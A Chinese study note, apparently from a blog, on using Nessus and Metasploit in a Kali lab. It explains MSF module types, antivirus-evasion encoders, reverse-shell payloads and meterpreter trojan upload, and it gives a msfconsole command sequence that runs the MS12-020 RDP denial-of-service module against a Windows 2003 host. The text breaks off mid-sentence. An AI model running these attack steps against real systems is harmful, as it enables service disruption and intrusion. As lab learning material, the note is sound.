admin管理员组

文章数量:1637695

  1. 系统扫描器nessus 的使用:
    • 主机发现(涵盖了nmap的功能)
    • 基本网络扫描(涵盖了web和漏洞的扫描)
    • 认证补丁扫描(操作系统扫描)
    • ping命令基于ICMP协议
    • 天境包含漏洞库 可以工具扫描出来的漏洞进行比对
  2. MSF的使用:
    • 扫描出系统漏洞之后使用MSF漏洞利用框架进行验证,kali最强大的就是MSF,windows远程桌面命令:mstsc,Kali:rdesktop
    • smb是共享文件的服务 ,modules/exploits/windows/smb,rdb是远程桌面连接服务 
    • Listener(监听器)  post攻击脚本   encoders编码加密,主要做免杀  nops绕过防火墙 evasion 规避
    • moudle(模块:7大模块 /usr/share/metasploit-framework)
      • auxiliary:包含辅助脚本,包括扫描、嗅探、破解、注入、漏洞挖掘等
        encoders:各种编码工具,用于躲过入侵检测和过滤系统
        exploits:包含传说中各种exp、0day、漏洞利用脚本,主要攻击代码
        nops:绕过防火墙
        payloads:攻击载荷,攻击者发送给系统执行的指令(不包含exploits攻击阶段),payloads主要是在目标机执行的,而exploits是在本地机执行作用于目标机
        post:目标机发送的一些功能性指令比如:提权,获取hash等。
    • 更新MSF,更新kali源(配置Kali官方源为中科大的源)
      • 1.vim /etc/apt/sources.list   
        2.注释掉官方源,加入以下中科大源,保存退出
        deb http://mirrors.ustc.edu/kali kali-rolling main non-free contrib
        deb-src http://mirrors.ustc.edu/kali kali-rolling main non-free contrib
        3.执行 apt update
        4.下载kali数字签名:wget archive.kali/archive-key.asc
        5.安装数字签名:apt-key add archive-key.asc 
        6.卸载msf:apt remove metasploit-framework
        7.安装msf:apt-get update| apt-get  install metasploit-framework
        8.启动msf自带数据库:systemctl start postgresql  
          允许开机自启动:systemctl enable postgresql 
        9.构建数据库缓存:msfdb init
        10.启动msf:msfconsole
    • Nessus扫描win2003及漏洞利用:
      • MS12-020漏洞利用:
      • msfconsole 进入msf控制台
        search ms12-020  搜索漏洞
        use auxiliary/dos/windows/rdp/ms12_020_maxchannelids 
        set RHOSTS ip(win2003)
        exploit
    • set payload/windos 设置windows攻击木马
      • bind_tcp 正向连接
      • reverse_tcp 反向连接 | 服务器连接客户机(方便穿墙)
    • ##meterpreter后期攻击使用方法:
      
      侵入主机从kali上传木马到受害者主机 upload 上传文件 (pcshare工具使用) ex

本文标签: 系统漏洞NessusMSF